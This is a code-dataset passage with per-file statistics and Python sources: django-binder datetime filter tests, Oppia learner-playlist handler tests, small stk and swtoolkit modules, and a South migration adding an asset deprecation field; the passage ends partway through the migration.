| 3.95
| 0.4
| 0.683544
| 0.303797
| 0.43038
| 0.417722
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.084112
| 107
| 8
| 17
| 13.375
| 0.806122
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.142857
| 0
| 0.142857
| 0.857143
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
e6f9cd1efc6f985b045e9ee3c14571c3c8ae2506
| 6,792
|
py
|
Python
|
tests/filters/test_datetime_filters.py
|
Bilonan/django-binder
|
d2d9b504a92029a0afc616be81a08f0deddd5b64
|
[
"MIT"
] | 14
|
2016-08-15T13:08:55.000Z
|
2021-11-17T11:43:20.000Z
|
tests/filters/test_datetime_filters.py
|
Bilonan/django-binder
|
d2d9b504a92029a0afc616be81a08f0deddd5b64
|
[
"MIT"
] | 141
|
2016-08-14T15:36:35.000Z
|
2022-02-17T08:53:52.000Z
|
tests/filters/test_datetime_filters.py
|
Bilonan/django-binder
|
d2d9b504a92029a0afc616be81a08f0deddd5b64
|
[
"MIT"
] | 18
|
2016-10-01T21:30:22.000Z
|
2022-03-28T10:51:41.000Z
|
from django.test import TestCase, Client
from binder.json import jsonloads
from django.contrib.auth.models import User
from ..testapp.models import Caretaker
class DateTimeFiltersTest(TestCase):
def setUp(self):
super().setUp()
u = User(username='testuser', is_active=True, is_superuser=True)
u.set_password('test')
u.save()
self.client = Client()
r = self.client.login(username='testuser', password='test')
self.assertTrue(r)
Caretaker(name='Peter', last_seen='2017-03-24T14:44:55Z').save()
Caretaker(name='Stefan', last_seen='2017-03-23T11:26:14Z').save()
def test_datetime_filter_exact_match(self):
response = self.client.get('/caretaker/', data={'.last_seen': '2017-03-24T14:44:55Z'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(1, len(result['data']))
self.assertEqual('Peter', result['data'][0]['name'])
# Alt syntax
response = self.client.get('/caretaker/', data={'.last_seen': '2017-03-23T12:26:14+0100'})
result = jsonloads(response.content)
self.assertEqual(1, len(result['data']))
self.assertEqual('Stefan', result['data'][0]['name'])
def test_datetime_filter_range(self):
response = self.client.get('/caretaker/', data={'.last_seen:range': '2017-03-24T14:44:54Z,2017-03-24T14:44:56Z'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(1, len(result['data']))
self.assertEqual('Peter', result['data'][0]['name'])
# Alt syntax
response = self.client.get('/caretaker/', data={'order_by': 'name', '.last_seen:range': '2017-03-23T10:00:00+0100,2017-03-25T00:00:00+0100'})
result = jsonloads(response.content)
self.assertEqual(2, len(result['data']))
self.assertEqual('Peter', result['data'][0]['name'])
self.assertEqual('Stefan', result['data'][1]['name'])
def test_datetime_filter_gte_match(self):
response = self.client.get('/caretaker/', data={'.last_seen:gte': '2017-03-23T11:26:14Z', 'order_by': 'last_seen'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(2, len(result['data']))
self.assertEqual('Stefan', result['data'][0]['name'])
self.assertEqual('Peter', result['data'][1]['name'])
response = self.client.get('/caretaker/', data={'.last_seen:gte': '2017-03-23T12:00:00Z', 'order_by': 'last_seen'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(1, len(result['data']))
self.assertEqual('Peter', result['data'][0]['name'])
response = self.client.get('/caretaker/', data={'.last_seen:gte': '2017-03-25T00:00:00Z'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(0, len(result['data']))
def test_datetime_filter_gt_match(self):
# One second before earliest "last seen"
response = self.client.get('/caretaker/', data={'.last_seen:gt': '2017-03-23T11:26:13Z', 'order_by': 'last_seen'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(2, len(result['data']))
self.assertEqual('Stefan', result['data'][0]['name'])
self.assertEqual('Peter', result['data'][1]['name'])
# One second later (exactly _on_ earliest "last seen")
response = self.client.get('/caretaker/', data={'.last_seen:gt': '2017-03-23T11:26:14Z', 'order_by': 'last_seen'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(1, len(result['data']))
self.assertEqual('Peter', result['data'][0]['name'])
response = self.client.get('/caretaker/', data={'.last_seen:gt': '2017-03-25T00:00:00Z'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(0, len(result['data']))
def test_datetime_filter_syntax_variations(self):
    """Date-only and full datetime syntaxes both work, but cannot be mixed."""
    def result_count(params):
        # Issue the filtered request and return how many records came back.
        resp = self.client.get('/caretaker/', data=params)
        self.assertEqual(resp.status_code, 200)
        return len(jsonloads(resp.content)['data'])

    # Sub-second precision is accepted.
    self.assertEqual(2, result_count(
        {'.last_seen:gt': '2017-03-23T11:26:13.9999Z', 'order_by': 'last_seen'}))
    # A bare date with :gt is implicitly completed to <date>T23:59:59Z.
    self.assertEqual(1, result_count(
        {'.last_seen:gt': '2017-03-23', 'order_by': 'last_seen'}))
    # Same completion rule, but a range start gets T00:00:00Z instead.
    self.assertEqual(1, result_count(
        {'.last_seen:range': '2017-03-23,2017-03-23', 'order_by': 'last_seen'}))
    # Sanity check: a two-day range covers both caretakers.
    self.assertEqual(2, result_count(
        {'.last_seen:range': '2017-03-23,2017-03-24', 'order_by': 'last_seen'}))
    # Mixing date and datetime syntax inside one range is rejected.
    response = self.client.get(
        '/caretaker/',
        data={'.last_seen:range': '2017-03-23T00:00:00Z,2017-03-24', 'order_by': 'last_seen'})
    self.assertEqual(response.status_code, 418)
def test_datetime_filter_syntax_errors_cause_error_response(self):
    """Malformed datetime literals must yield an error response (418)."""
    bad_values = [
        '1838-05',               # month precision only
        '1838-05-01-02',         # too many date components
        '1838-05-01T02:10',      # incomplete timestamp
        '1838-05-01T02:10:0220', # missing +/- (or too many seconds)
    ]
    for bad_value in bad_values:
        response = self.client.get('/caretaker/', data={'.last_seen': bad_value})
        self.assertEqual(response.status_code, 418)
def test_datetime_isnull(self):
    """isnull=True returns only records whose last_seen is NULL."""
    # Due to corona, I forgot when I last saw bob.
    Caretaker(name='Bob', last_seen=None).save()

    response = self.client.get('/caretaker/', data={'.last_seen:isnull': 'True'})
    records = jsonloads(response.content)['data']

    # Only Bob — the record without a last_seen value — is returned.
    self.assertEqual(1, len(records))
    self.assertEqual('Bob', records[0]['name'])
def test_datetime__isnull_false(self):
    """Every falsy spelling of isnull filters out NULL last_seen records."""
    # Due to corona, I forgot when I last saw bob.
    Caretaker(name='Bob', last_seen=None).save()

    for false_value in ('0', 'false', 'False'):
        response = self.client.get(
            '/caretaker/', data={'.last_seen:isnull': false_value})
        records = jsonloads(response.content)['data']
        # Bob (NULL last_seen) is excluded; the two dated records remain.
        self.assertEqual(2, len(records))
        self.assertNotEqual('Bob', records[0]['name'])
        self.assertNotEqual('Bob', records[1]['name'])
| 37.318681
| 143
| 0.703916
| 952
| 6,792
| 4.917017
| 0.168067
| 0.1442
| 0.080752
| 0.094211
| 0.813074
| 0.777612
| 0.751335
| 0.728904
| 0.722709
| 0.684469
| 0
| 0.070378
| 0.108804
| 6,792
| 181
| 144
| 37.524862
| 0.702957
| 0.077444
| 0
| 0.554545
| 0
| 0.009091
| 0.22976
| 0.03728
| 0
| 0
| 0
| 0
| 0.436364
| 1
| 0.081818
| false
| 0.018182
| 0.036364
| 0
| 0.127273
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e6fc3609aaf1967d30459104f70f9cdc36f01204
| 14,561
|
py
|
Python
|
core/controllers/learner_playlist_test.py
|
oswalgopal/oppia
|
7513e8eca5adc278974ad266b0ea3f59a646983d
|
[
"Apache-2.0"
] | 2
|
2021-04-08T01:06:08.000Z
|
2021-06-02T08:20:13.000Z
|
core/controllers/learner_playlist_test.py
|
gitter-badger/oppia
|
7d8e659264582d7ce74bc6c139e597b82bca0e04
|
[
"Apache-2.0"
] | 35
|
2019-02-23T20:31:21.000Z
|
2019-08-19T12:32:13.000Z
|
core/controllers/learner_playlist_test.py
|
gitter-badger/oppia
|
7d8e659264582d7ce74bc6c139e597b82bca0e04
|
[
"Apache-2.0"
] | 1
|
2021-01-28T05:20:56.000Z
|
2021-01-28T05:20:56.000Z
|
# Copyright 2017 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for the learner playlist."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
from constants import constants
from core.domain import learner_playlist_services
from core.domain import learner_progress_services
from core.tests import test_utils
import feconf
import python_utils
class LearnerPlaylistHandlerTests(test_utils.GenericTestBase):
    """Tests for adding, rearranging and removing learner playlist items."""

    OWNER_EMAIL = 'owner@example.com'
    OWNER_USERNAME = 'owner'

    EXP_ID_1 = 'exp_id_1'
    EXP_TITLE_1 = 'exp title 1'
    EXP_ID_2 = 'exp_id_2'
    EXP_TITLE_2 = 'exp title 2'
    EXP_ID_3 = 'exp_id_3'
    EXP_TITLE_3 = 'exp title 3'
    EXP_ID_4 = 'exp_id_4'
    EXP_TITLE_4 = 'exp title 4'
    COL_ID_1 = 'col_id_1'
    COL_TITLE_1 = 'col title 1'
    COL_ID_2 = 'col_id_2'
    COL_TITLE_2 = 'col title 2'
    COL_ID_3 = 'col_id_3'
    COL_TITLE_3 = 'col title 3'
    COL_ID_4 = 'col_id_4'
    COL_TITLE_4 = 'col title 4'

    def setUp(self):
        super(LearnerPlaylistHandlerTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.signup(self.VIEWER_EMAIL, self.VIEWER_USERNAME)

        self.viewer_id = self.get_user_id_from_email(self.VIEWER_EMAIL)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)

        # Save the explorations. EXP_ID_4 is created by the viewer so that it
        # counts as one of their subscribed activities in the tests below.
        self.save_new_default_exploration(
            self.EXP_ID_1, self.owner_id, title=self.EXP_TITLE_1)
        self.save_new_default_exploration(
            self.EXP_ID_2, self.owner_id, title=self.EXP_TITLE_2)
        self.save_new_default_exploration(
            self.EXP_ID_3, self.owner_id, title=self.EXP_TITLE_3)
        # Fix: previously used EXP_TITLE_3 here (copy-paste slip); EXP_ID_4
        # now gets its own title, matching the COL_ID_4/COL_TITLE_4 pattern.
        self.save_new_default_exploration(
            self.EXP_ID_4, self.viewer_id, title=self.EXP_TITLE_4)

        # Save the collections. COL_ID_4 is created by the viewer for the
        # same reason as EXP_ID_4 above.
        self.save_new_default_collection(
            self.COL_ID_1, self.owner_id, title=self.COL_TITLE_1)
        self.save_new_default_collection(
            self.COL_ID_2, self.owner_id, title=self.COL_TITLE_2)
        self.save_new_default_collection(
            self.COL_ID_3, self.owner_id, title=self.COL_TITLE_3)
        self.save_new_default_collection(
            self.COL_ID_4, self.viewer_id, title=self.COL_TITLE_4)

    def test_add_exploration_to_learner_playlist(self):
        """Adding, reordering and rejecting explorations in the playlist."""
        self.login(self.VIEWER_EMAIL)
        csrf_token = self.get_new_csrf_token()

        # Add one exploration to the playlist.
        self.post_json(
            '%s/%s/%s' % (
                feconf.LEARNER_PLAYLIST_DATA_URL,
                constants.ACTIVITY_TYPE_EXPLORATION,
                self.EXP_ID_1), {},
            csrf_token=csrf_token)
        self.assertEqual(
            learner_playlist_services.get_all_exp_ids_in_learner_playlist(
                self.viewer_id), [self.EXP_ID_1])

        # Add another exploration.
        self.post_json(
            '%s/%s/%s' % (
                feconf.LEARNER_PLAYLIST_DATA_URL,
                constants.ACTIVITY_TYPE_EXPLORATION,
                self.EXP_ID_2), {},
            csrf_token=csrf_token)
        self.assertEqual(
            learner_playlist_services.get_all_exp_ids_in_learner_playlist(
                self.viewer_id), [self.EXP_ID_1, self.EXP_ID_2])

        # User rearranges the explorations. 'exp title 2' is shifted to the
        # first position.
        payload = {
            'index': 0
        }
        self.post_json(
            '%s/%s/%s' % (
                feconf.LEARNER_PLAYLIST_DATA_URL,
                constants.ACTIVITY_TYPE_EXPLORATION,
                self.EXP_ID_2), payload,
            csrf_token=csrf_token)
        self.assertEqual(
            learner_playlist_services.get_all_exp_ids_in_learner_playlist(
                self.viewer_id), [self.EXP_ID_2, self.EXP_ID_1])

        # If an exploration belongs to the incomplete list or completed list,
        # it should not be added. Here we test for the completed case.
        learner_progress_services.mark_exploration_as_completed(
            self.viewer_id, self.EXP_ID_3)
        response = self.post_json(
            '%s/%s/%s' % (
                feconf.LEARNER_PLAYLIST_DATA_URL,
                constants.ACTIVITY_TYPE_EXPLORATION,
                self.EXP_ID_3), {},
            csrf_token=csrf_token)
        self.assertEqual(
            response['belongs_to_completed_or_incomplete_list'], True)
        self.assertEqual(
            learner_playlist_services.get_all_exp_ids_in_learner_playlist(
                self.viewer_id), [self.EXP_ID_2, self.EXP_ID_1])

        # If an exploration belongs to one of the subscribed explorations,
        # it should not be added to the learner playlist.
        response = self.post_json(
            '%s/%s/%s' % (
                feconf.LEARNER_PLAYLIST_DATA_URL,
                constants.ACTIVITY_TYPE_EXPLORATION,
                self.EXP_ID_4), {},
            csrf_token=csrf_token)
        self.assertEqual(
            response['belongs_to_subscribed_activities'], True)
        self.assertEqual(
            learner_playlist_services.get_all_exp_ids_in_learner_playlist(
                self.viewer_id), [self.EXP_ID_2, self.EXP_ID_1])

        # Now we begin testing of not exceeding the limit of activities in the
        # learner playlist.
        # Add feconf.MAX_LEARNER_PLAYLIST_ACTIVITY_COUNT - 2 activities to
        # reach the maximum limit (two slots are already used above).
        for exp_id in python_utils.RANGE(
                5, feconf.MAX_LEARNER_PLAYLIST_ACTIVITY_COUNT + 3):
            self.post_json(
                '%s/%s/%s' % (
                    feconf.LEARNER_PLAYLIST_DATA_URL,
                    constants.ACTIVITY_TYPE_EXPLORATION,
                    'exp_id_%s' % exp_id), {},
                csrf_token=csrf_token)

        # Now if we try and add an activity we should get a message saying we
        # are exceeding the limit.
        response = self.post_json(
            '%s/%s/%s' % (
                feconf.LEARNER_PLAYLIST_DATA_URL,
                constants.ACTIVITY_TYPE_EXPLORATION,
                'exp_id_%s' %
                python_utils.UNICODE(
                    feconf.MAX_LEARNER_PLAYLIST_ACTIVITY_COUNT + 3)),
            {}, csrf_token=csrf_token)
        self.assertEqual(response['playlist_limit_exceeded'], True)
        self.logout()

    def test_add_collection_to_learner_playlist(self):
        """Adding, reordering and rejecting collections in the playlist."""
        self.login(self.VIEWER_EMAIL)
        csrf_token = self.get_new_csrf_token()

        # Add one collection to the playlist.
        self.post_json(
            '%s/%s/%s' % (
                feconf.LEARNER_PLAYLIST_DATA_URL,
                constants.ACTIVITY_TYPE_COLLECTION,
                self.COL_ID_1), {},
            csrf_token=csrf_token)
        self.assertEqual(
            learner_playlist_services.get_all_collection_ids_in_learner_playlist( # pylint: disable=line-too-long
                self.viewer_id), [self.COL_ID_1])

        # Add another collection.
        self.post_json(
            '%s/%s/%s' % (
                feconf.LEARNER_PLAYLIST_DATA_URL,
                constants.ACTIVITY_TYPE_COLLECTION,
                self.COL_ID_2), {},
            csrf_token=csrf_token)
        self.assertEqual(
            learner_playlist_services.get_all_collection_ids_in_learner_playlist( # pylint: disable=line-too-long
                self.viewer_id), [self.COL_ID_1, self.COL_ID_2])

        # User rearranges the collections. 'col title 2' is shifted to the
        # first position.
        payload = {
            'index': 0
        }
        self.post_json(
            '%s/%s/%s' % (
                feconf.LEARNER_PLAYLIST_DATA_URL,
                constants.ACTIVITY_TYPE_COLLECTION,
                self.COL_ID_2), payload,
            csrf_token=csrf_token)
        self.assertEqual(
            learner_playlist_services.get_all_collection_ids_in_learner_playlist( # pylint: disable=line-too-long
                self.viewer_id), [self.COL_ID_2, self.COL_ID_1])

        # If a collection belongs to the incomplete list or completed list, it
        # should not be added. Here we test for the completed case.
        learner_progress_services.mark_collection_as_completed(
            self.viewer_id, self.COL_ID_3)
        response = self.post_json(
            '%s/%s/%s' % (
                feconf.LEARNER_PLAYLIST_DATA_URL,
                constants.ACTIVITY_TYPE_COLLECTION,
                self.COL_ID_3), {},
            csrf_token=csrf_token)
        self.assertEqual(
            response['belongs_to_completed_or_incomplete_list'], True)
        self.assertEqual(
            learner_playlist_services.get_all_collection_ids_in_learner_playlist( # pylint: disable=line-too-long
                self.viewer_id), [self.COL_ID_2, self.COL_ID_1])

        # If a collection belongs to one of the subscribed collections,
        # it should not be added to the learner playlist.
        response = self.post_json(
            '%s/%s/%s' % (
                feconf.LEARNER_PLAYLIST_DATA_URL,
                constants.ACTIVITY_TYPE_COLLECTION,
                self.COL_ID_4), {},
            csrf_token=csrf_token)
        self.assertEqual(
            response['belongs_to_subscribed_activities'], True)
        self.assertEqual(
            learner_playlist_services
            .get_all_collection_ids_in_learner_playlist(
                self.viewer_id), [self.COL_ID_2, self.COL_ID_1])

        # Now we begin testing of not exceeding the limit of activities in the
        # learner playlist.
        # Add feconf.MAX_LEARNER_PLAYLIST_ACTIVITY_COUNT - 2 activities to
        # reach the maximum limit (two slots are already used above).
        for col_id in python_utils.RANGE(
                5, feconf.MAX_LEARNER_PLAYLIST_ACTIVITY_COUNT + 3):
            self.post_json(
                '%s/%s/%s' % (
                    feconf.LEARNER_PLAYLIST_DATA_URL,
                    constants.ACTIVITY_TYPE_COLLECTION,
                    'col_id_%s' % col_id), {},
                csrf_token=csrf_token)

        # Now if we try and add an activity we should get a message saying we
        # are exceeding the limit. Fix: the over-limit id previously used an
        # 'exp_id_' prefix in this collection test; it now uses 'col_id_' for
        # consistency (the limit check does not depend on the id string).
        response = self.post_json(
            '%s/%s/%s' % (
                feconf.LEARNER_PLAYLIST_DATA_URL,
                constants.ACTIVITY_TYPE_COLLECTION,
                'col_id_%s' %
                python_utils.UNICODE(
                    feconf.MAX_LEARNER_PLAYLIST_ACTIVITY_COUNT + 3)),
            {}, csrf_token=csrf_token)
        self.assertEqual(response['playlist_limit_exceeded'], True)
        self.logout()

    def test_remove_exploration_from_learner_playlist(self):
        """Removing explorations is idempotent and preserves order."""
        self.login(self.VIEWER_EMAIL)

        # Add explorations to the learner playlist.
        learner_progress_services.add_exp_to_learner_playlist(
            self.viewer_id, self.EXP_ID_1)
        learner_progress_services.add_exp_to_learner_playlist(
            self.viewer_id, self.EXP_ID_2)
        self.assertEqual(
            learner_playlist_services.get_all_exp_ids_in_learner_playlist(
                self.viewer_id), [self.EXP_ID_1, self.EXP_ID_2])

        # Remove an exploration.
        self.delete_json(
            '%s/%s/%s' % (
                feconf.LEARNER_PLAYLIST_DATA_URL,
                constants.ACTIVITY_TYPE_EXPLORATION,
                self.EXP_ID_1))
        self.assertEqual(
            learner_playlist_services.get_all_exp_ids_in_learner_playlist(
                self.viewer_id), [self.EXP_ID_2])

        # Removing the same exploration again has no effect.
        self.delete_json('%s/%s/%s' % (
            feconf.LEARNER_PLAYLIST_DATA_URL,
            constants.ACTIVITY_TYPE_EXPLORATION,
            self.EXP_ID_1))
        self.assertEqual(
            learner_playlist_services.get_all_exp_ids_in_learner_playlist(
                self.viewer_id), [self.EXP_ID_2])

        # Remove the second exploration.
        self.delete_json('%s/%s/%s' % (
            feconf.LEARNER_PLAYLIST_DATA_URL,
            constants.ACTIVITY_TYPE_EXPLORATION,
            self.EXP_ID_2))
        self.assertEqual(
            learner_playlist_services.get_all_exp_ids_in_learner_playlist(
                self.viewer_id), [])
        self.logout()

    def test_remove_collection_from_learner_playlist(self):
        """Removing collections is idempotent and preserves order."""
        self.login(self.VIEWER_EMAIL)

        # Add collections to the learner playlist.
        learner_progress_services.add_collection_to_learner_playlist(
            self.viewer_id, self.COL_ID_1)
        learner_progress_services.add_collection_to_learner_playlist(
            self.viewer_id, self.COL_ID_2)
        self.assertEqual(
            learner_playlist_services.get_all_collection_ids_in_learner_playlist( # pylint: disable=line-too-long
                self.viewer_id), [self.COL_ID_1, self.COL_ID_2])

        # Remove a collection.
        self.delete_json('%s/%s/%s' % (
            feconf.LEARNER_PLAYLIST_DATA_URL,
            constants.ACTIVITY_TYPE_COLLECTION, self.COL_ID_1))
        self.assertEqual(
            learner_playlist_services.get_all_collection_ids_in_learner_playlist( # pylint: disable=line-too-long
                self.viewer_id), [self.COL_ID_2])

        # Removing the same collection again has no effect.
        self.delete_json('%s/%s/%s' % (
            feconf.LEARNER_PLAYLIST_DATA_URL,
            constants.ACTIVITY_TYPE_COLLECTION, self.COL_ID_1))
        self.assertEqual(
            learner_playlist_services.get_all_collection_ids_in_learner_playlist( # pylint: disable=line-too-long
                self.viewer_id), [self.COL_ID_2])

        # Remove the second collection.
        self.delete_json('%s/%s/%s' % (
            feconf.LEARNER_PLAYLIST_DATA_URL,
            constants.ACTIVITY_TYPE_COLLECTION, self.COL_ID_2))
        self.assertEqual(
            learner_playlist_services.get_all_collection_ids_in_learner_playlist( # pylint: disable=line-too-long
                self.viewer_id), [])
        self.logout()
| 41.366477
| 113
| 0.635533
| 1,839
| 14,561
| 4.659598
| 0.100598
| 0.136539
| 0.029408
| 0.04668
| 0.854475
| 0.819816
| 0.796359
| 0.770802
| 0.724589
| 0.724472
| 0
| 0.011124
| 0.28384
| 14,561
| 351
| 114
| 41.48433
| 0.810606
| 0.176087
| 0
| 0.715385
| 0
| 0
| 0.047607
| 0.015757
| 0
| 0
| 0
| 0
| 0.092308
| 1
| 0.019231
| false
| 0
| 0.030769
| 0
| 0.123077
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fc0a8fb65ba51e4457fbb5ca3688e346a072798b
| 336
|
py
|
Python
|
src/stk/ea/__init__.py
|
andrewtarzia/stk
|
1ac2ecbb5c9940fe49ce04cbf5603fd7538c475a
|
[
"MIT"
] | 21
|
2018-04-12T16:25:24.000Z
|
2022-02-14T23:05:43.000Z
|
src/stk/ea/__init__.py
|
JelfsMaterialsGroup/stk
|
0d3e1b0207aa6fa4d4d5ee8dfe3a29561abb08a2
|
[
"MIT"
] | 8
|
2019-03-19T12:36:36.000Z
|
2020-11-11T12:46:00.000Z
|
src/stk/ea/__init__.py
|
supramolecular-toolkit/stk
|
0d3e1b0207aa6fa4d4d5ee8dfe3a29561abb08a2
|
[
"MIT"
] | 5
|
2018-08-07T13:00:16.000Z
|
2021-11-01T00:55:10.000Z
|
# Public API of the ``stk.ea`` subpackage: re-export every public name from
# the submodules so callers can import them from ``stk.ea`` directly.
# NOTE: star-imports are intentional here (``# noqa`` suppresses the linter);
# do not reorder without checking for name collisions between submodules.
from .crossover import * # noqa
from .fitness_calculators import * # noqa
from .mutation import * # noqa
from .fitness_normalizers import * # noqa
from .plotters import * # noqa
from .selection import * # noqa
from .generation import * # noqa
from .evolutionary_algorithm import * # noqa
from .molecule_records import * # noqa
| 33.6
| 45
| 0.732143
| 40
| 336
| 6.05
| 0.375
| 0.371901
| 0.46281
| 0.173554
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1875
| 336
| 9
| 46
| 37.333333
| 0.886447
| 0.130952
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
fc3c1ffac10dea924a7e5536f41609b58815f627
| 175
|
py
|
Python
|
swtoolkit/api/interfaces/idrawingdoc.py
|
szcyd-chian/soliwordsapi
|
87d496f82f40febee3bdf4de878064a98a82c005
|
[
"MIT"
] | 16
|
2020-11-03T14:40:30.000Z
|
2022-03-02T15:38:40.000Z
|
swtoolkit/api/interfaces/idrawingdoc.py
|
szcyd-chian/soliwordsapi
|
87d496f82f40febee3bdf4de878064a98a82c005
|
[
"MIT"
] | 2
|
2021-03-02T12:10:24.000Z
|
2021-11-19T21:34:47.000Z
|
swtoolkit/api/interfaces/idrawingdoc.py
|
szcyd-chian/soliwordsapi
|
87d496f82f40febee3bdf4de878064a98a82c005
|
[
"MIT"
] | 8
|
2020-11-11T12:25:58.000Z
|
2022-03-28T06:06:44.000Z
|
class IDrawingDoc:
    """Thin wrapper around an underlying drawing-document interop object.

    Stores the raw object handed in at construction and exposes it through
    the private ``_instance`` property.
    """

    def __init__(self, system_object):
        # Keep a reference to the raw underlying object; all delegation
        # happens through the ``_instance`` property below.
        self.system_object = system_object

    @property
    def _instance(self):
        """Return the wrapped system object."""
        return self.system_object
| 21.875
| 42
| 0.691429
| 20
| 175
| 5.6
| 0.5
| 0.428571
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.24
| 175
| 7
| 43
| 25
| 0.842105
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0.166667
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
fc7a8ae8697305f8c17541dd36d25921658dd5ad
| 23,542
|
py
|
Python
|
src/ralph_assets/migrations/0005_auto__add_field_asset_force_deprecation.py
|
xliiv/ralph_assets
|
73e5e46db380c9a8dafb9ca1bd5abe47d5733385
|
[
"Apache-2.0"
] | null | null | null |
src/ralph_assets/migrations/0005_auto__add_field_asset_force_deprecation.py
|
xliiv/ralph_assets
|
73e5e46db380c9a8dafb9ca1bd5abe47d5733385
|
[
"Apache-2.0"
] | null | null | null |
src/ralph_assets/migrations/0005_auto__add_field_asset_force_deprecation.py
|
xliiv/ralph_assets
|
73e5e46db380c9a8dafb9ca1bd5abe47d5733385
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
    """Apply the migration: add the boolean 'force_deprecation' column.

    The column is added to the 'ralph_assets_asset' table with a default
    of False; keep_default=False means the default is used only to fill
    existing rows, not kept on the schema.
    """
    # Adding field 'Asset.force_deprecation'
    db.add_column('ralph_assets_asset', 'force_deprecation',
                  self.gf('django.db.models.fields.BooleanField')(default=False),
                  keep_default=False)
def backwards(self, orm):
# Deleting field 'Asset.force_deprecation'
db.delete_column('ralph_assets_asset', 'force_deprecation')
models = {
'account.profile': {
'Meta': {'object_name': 'Profile'},
'activation_token': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '40', 'blank': 'True'}),
'birth_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'city': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'country': ('django.db.models.fields.PositiveIntegerField', [], {'default': '153'}),
'gender': ('django.db.models.fields.PositiveIntegerField', [], {'default': '2'}),
'home_page': (u'dj.choices.fields.ChoiceField', [], {'unique': 'False', 'primary_key': 'False', 'db_column': 'None', 'blank': 'False', u'default': '1', 'null': 'False', '_in_south': 'True', 'db_index': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_active': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'nick': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '30', 'blank': 'True'}),
'time_zone': ('django.db.models.fields.FloatField', [], {'default': '1.0'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
